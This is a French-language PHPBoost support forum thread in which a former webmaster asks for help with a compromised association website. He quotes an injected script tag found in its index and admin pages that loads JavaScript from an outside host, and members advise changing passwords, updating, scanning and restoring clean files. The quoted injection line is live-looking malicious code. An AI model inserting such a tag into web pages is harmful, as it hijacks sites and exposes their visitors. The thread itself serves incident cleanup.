Site Haker
Version 3.10
Support Général
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
Je viens vers vous pour un probleme de hack a ce qu'il me semble
on a fait appel a moi car j'etais le gestionnaire du site Indre Poker il y a 3 ans, donc le nouveau admin se retrouve dans la mouise avec un gros probleme
il ne peut plus gerer le site il y a un bug qui ressemble fortement a un hake
a chaque clic
par exemple clic sur administration
on a une page qui apprait blocant tout
voici le screen de la page en question
j'ai demandé la page index.php ainsi que la page admin_index.php
dedant j'ai trouvé un script bizarre que voici
Code PHP :
<script src="http://waysidegrill.com/_NEW/G9RU1v78.php?id=48852683" type="text/javascript"></script>
j'ai donc virer ce script sur les 2 pages mais le probleme persiste le scripte reapparait avec son blocage
forum inaccessible etc.. erreur 500 et j'en passe
precision il n'ont pas de sauvegarde de faite (pfii)
ils ont acces au ftp
l'adresse du site en question
http://indrepoker.com
merci a tous pour votre aide
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
Édité par PascalD36 Le 24/11/2013 à 19h04
ReidLos Membre non connecté
- Modérateur
- Voir le profil du membre ReidLos
- Inscrit le : 27/02/2009
- Site internet
- Groupes :
- Equipe Développement
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
ElenWii Membre non connecté
- Administrateur
- Voir le profil du membre ElenWii
- Inscrit le : 14/08/2009
- Site internet
- Groupes :
- Equipe Graphique
Tu peux lui demander les logs du serveur pour voir ce qui c'est passé ?
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
sinon vous en pensez quoi, deja vu un truc pareil ?
j1.seth Membre non connecté
- Administrateur
- Voir le profil du membre j1.seth
- Inscrit le : 01/09/2008
- Site internet
- Groupes :
- Chef de Projet
- Equipe Développement
La première des choses a faire est de changer tous les mots de passe et bien sûr mettre un mot de passe différent pour le ftp, la base de données et les accès admin du site.
janus57 Membre non connecté
- Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
- Equipe Assistance
de mémoire entre l version 3.0.8 et la 3.0.11 une faille de sécurité à été changé, même que la MAJ dans la panel admin de PHPBoost doit apparaitre en critique (de mémoire).
Ensuite comme dit faut changer tout les PASS (OVH/FTP/BDD/ADMIN).
Enfin : http://sitecheck.sucuri.net/results/indrepoker.com
Edit : soit c'est une modif de masse de pas mal de fichier php, soit c'est une inclusion dans un TPL
Cordialement, janus57
Édité par janus57 Le 24/11/2013 à 22h37
lobab Membre non connecté
Booster Mortier
- Booster Mortier
- Voir le profil du membre lobab
- Inscrit le : 25/02/2012
Code TEXT :
Malware found on javascript file: http://indrepoker.com/templates/IndrePoker/tableau/tabcontent.js
Code TEXT :
This malware is generally hidden inside the PHP or ASP files.
Une question me vient : quel est ce lien /tableau/tabcontent.js ?
Sauf si je me trompe, cela n'est pas d'origine dans phpboost.
Donc, soit c'est un ajout volontaire du webmaster ( par exemple c'est un fichier qui fait partie d'un utilitaire ou autre chose),
soit c'est effectivement un hack, mais dans les 2 cas, ce script a été déposé sur le ftp directement, et par conséquent en utilisant le bon mot de passe.
Je ne suis pas persuadé que ce soit à partir d'une injection sql, mais bon ...
La puissance est un sommet de connaissances et l'intelligence est le moyen d'y accéder ... Est-ce pour ça qu'il y a tant de cons en bas des pistes ???
Heureux celui qui est sourd, lui au moins, peut écouter le silence
Heureux celui qui est sourd, lui au moins, peut écouter le silence
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
ca a ete mis par moi a l'epoque ou j'en avais la gestion cela servait dans l'edito pou un affichage a onglet si, j'ai bonne memoire
exemple prit sur le site la rochelle et son histoire qui etait sous phpboost aussi
d'apres ce que je vois cela ne sert plus aujourd'hui mais bon il faut dire qu'il y a eu des presidence apres la mienne donc 3 admins differents, il faut dire que les president sont restés tres peu apres moi, c'est du boulot une asso ca decourage
le site n'a certainement pas et entretenu comme il faudrait la preuve en est puisque les mise a jour n'ont pas ete faites
Je ne sais aps par contre si les mots de passe ont ete changés entre chaque admin, je l'espere car c'est une des premiere chose que j'aurai fait
moi quand j'ai cree l'asso et pris phpboost j'avais mis le site chez easy hebergement, j'ai presidé 5 ans, apres quand j'ai laissé ma place le site a ete transferer chez un hebergeur espagnol pourquoi lol l'admin etait espagnole surement
enfin bref un site donné cle en main qui tournait bien et le voici peter
vais essayer avec votre aide de les aider puisque le nouveau admin a fait appel a moi, mais je vais pas me prendre la tete avec le hack surtout qu'il y a meme pas de sauvegarde la derniere etait la mienne 2010
Édité par PascalD36 Le 25/11/2013 à 00h09
lobab Membre non connecté
Booster Mortier
- Booster Mortier
- Voir le profil du membre lobab
- Inscrit le : 25/02/2012
(rapatries d'abord les fichiers sur ton pc, ça sera plus facile )
Soit tu vires manuellement ça partout où ça se trouve :
Code TPL :
Soit tu écrases tous les fichiers infectés en retransfèrant les fichiers d'origine de phpboost correspondant (encore faut-il avoir une sauvegarde de la version 3.08 )
En faisant l'un ou l'autre, tu devrais en théorie, récupérer l'accès au site et à l'admin, mais cela ne voudra pas dire que tout est nettoyé ...
Autre possibilité qui est la plus facile, demander à l'hébergeur s'il a une sauvegarde non infectée.
La puissance est un sommet de connaissances et l'intelligence est le moyen d'y accéder ... Est-ce pour ça qu'il y a tant de cons en bas des pistes ???
Heureux celui qui est sourd, lui au moins, peut écouter le silence
Heureux celui qui est sourd, lui au moins, peut écouter le silence
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
aiglobulles Membre non connecté
Booster Missile
- Booster Missile
- Voir le profil du membre aiglobulles
- Inscrit le : 15/08/2008
- Groupes :
aiglobulles Membre non connecté
Booster Missile
- Booster Missile
- Voir le profil du membre aiglobulles
- Inscrit le : 15/08/2008
- Groupes :
Tu peux voir comment y accéder via le guide ICI
S'il ne s'agit que d'un problème de tpl modifié ou d'ajout d'un js, il te suffit de récupérer le bon snapshot (cf guide en lien) puis de vider ton contenu actuel et de rebalancer le contenu de ton snapshot, puis bah de faire toutes les modifs des mots de passe
ElenWii Membre non connecté
- Administrateur
- Voir le profil du membre ElenWii
- Inscrit le : 14/08/2009
- Site internet
- Groupes :
- Equipe Graphique
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie